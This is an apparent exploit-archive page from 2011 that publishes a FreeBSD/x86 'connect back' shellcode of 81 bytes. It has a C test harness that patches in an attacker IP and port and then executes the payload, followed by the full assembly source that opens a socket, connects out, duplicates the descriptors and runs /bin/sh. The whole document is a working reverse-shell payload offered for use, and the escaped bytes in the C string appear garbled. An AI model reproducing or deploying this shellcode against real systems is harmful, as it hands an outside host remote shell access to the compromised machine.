[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BSD x86 connect back Shellcode (81 bytes)
# Published : 2011-01-21
# Author :
# Previous Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Next Title : Linux/x86 Remote Port Forwarding Shellcode 87 bytes
/*
-------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ----------------
* AUTHOR : Tosh
* OS : BSDx86 (Tested on FreeBSD 8.1)
* EMAIL : tosh@tuxfamily.org
*/
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
char shellcode [] = "x31xc0x50x6ax01x6ax02xb0x61x50xcdx80x89xc2"
"x68x7fx00x00x01x66x68x05x39x66x68x01x02x89"
"xe1x6ax10x51x52x31xc0xb0x62x50xcdx80x31xc9"
"x51x52x31xc0xb0x5ax50xcdx80xfexc1x80xf9x03"
"x75xf0x31xc0x50x68x2fx2fx73x68x68x2fx62x69"
"x6ex89xe3x50x54x53xb0x3bx50xcdx80";
void change_shellcode(const char *ip, unsigned short port)
{
*((unsigned long*)(shellcode + 15)) = inet_addr(ip);
*((unsigned short*)(shellcode + 21)) = htons(port);
}
void print_shellcode(void)
{
int i;
for(i = 0; i < sizeof(shellcode) - 1; i++)
{
printf("\x%.2x", (unsigned char)shellcode[i]);
}
printf("n");
}
int main(void)
{
const char ip[] = "127.0.0.1";
unsigned short port = 1337;
change_shellcode(ip, port);
print_shellcode();
printf("Shellcode len = %d bytesn", sizeof(shellcode)-1);
void (*f)() = (void*) shellcode;
f();
return 0;
}
/*
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Syscalls nums, on /usr/src/sys/kern/syscalls.master ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%define IPPROTO_TCP 6
%define SOCK_STREAM 1
%define AF_INET 2
%define SYS_EXECV 59
%define SYS_DUP2 90
%define SYS_SOCKET 97
%define SYS_CONNECT 98
section .text
global _start
_start:
xor eax, eax
;;;;;;;;;;;;;;;;;;;;;;
; socket()
;;;;;;;;;;;;;;;;;;;;;;
push eax
push byte SOCK_STREAM
push byte AF_INET
mov al, SYS_SOCKET
push eax
int 0x80
mov edx, eax
;;;;;;;;;;;;;;;;;;;;;;
; sockaddr_in
;;;;;;;;;;;;;;;;;;;;;;
push 0x0100007f
push word 0x3905
push word 0x0201
mov ecx, esp
;;;;;;;;;;;;;;;;;;;;;
; connect()
;;;;;;;;;;;;;;;;;;;;;
push byte 16
push ecx
push edx
xor eax, eax
mov al, SYS_CONNECT
push eax
int 0x80
;;;;;;;;;;;;;;;;;;;;;
; dup2()
;;;;;;;;;;;;;;;;;;;;;
xor ecx, ecx
.L:
push ecx
push edx
xor eax, eax
mov al, SYS_DUP2
push eax
int 0x80
inc cl
cmp cl, 3
jne .L
;;;;;;;;;;;;;;;;;;;;;;
; execv("/bin/sh")
;;;;;;;;;;;;;;;;;;;;;;
xor eax, eax
push eax
push '//sh'
push '/bin'
mov ebx, esp
push eax
push esp
push ebx
mov al, SYS_EXECV
push eax
int 0x80
*/